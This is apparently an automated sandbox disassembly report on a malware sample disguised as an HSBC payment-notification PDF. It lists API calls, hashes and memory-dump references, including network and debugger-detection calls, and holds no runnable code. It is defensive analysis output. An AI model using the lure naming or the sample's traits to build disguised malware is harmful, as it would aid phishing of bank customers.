                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                    • String ID: static
                                                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                                                    • Opcode ID: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                                                                                                                    • Instruction ID: 619ac3c59cbe9074ca3f8c975c7c8c691f8bfa66afa20d6a6bf36cd90ef0372b
                                                                                                                                                    • Opcode Fuzzy Hash: 9c6eecc6bf7be964b917928501c6ce077e485374675d84249056efc255601d24
                                                                                                                                                    • Instruction Fuzzy Hash: DC212CB2510209AFDF04EFA8CC45EEE7BA8FB08315F114A29FD55D2250D639E851DB64
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 004869A2
                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                                                    • String ID: edit
                                                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                                                    • Opcode ID: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                                                                                                                    • Instruction ID: c4dc0b7ee3ea423f7e1eb401844c401eee0777dcbcb5b463cc5485c74a1bef4f
                                                                                                                                                    • Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                                                                                                                    • Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 00462A22
                                                                                                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                                                    • Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                                                                                                                    • Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
                                                                                                                                                    • Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                                                                                                                    • Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A
                                                                                                                                                    APIs
                                                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
                                                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                                                    • String ID: <local>
                                                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                                                    • Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                                                                                                                    • Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
                                                                                                                                                    • Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                                                                                                                    • Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
APIs
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
  • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
APIs
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
  • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
APIs
• VariantInit.OLEAUT32(?), ref: 0045C534
  • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
  • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
  • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
• VariantClear.OLEAUT32(?), ref: 0045C556
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Variant$Init$ClearCopy_memmove
• String ID: d}K
• API String ID: 2932060187-3405784397
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
APIs
  • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
  • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
• IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599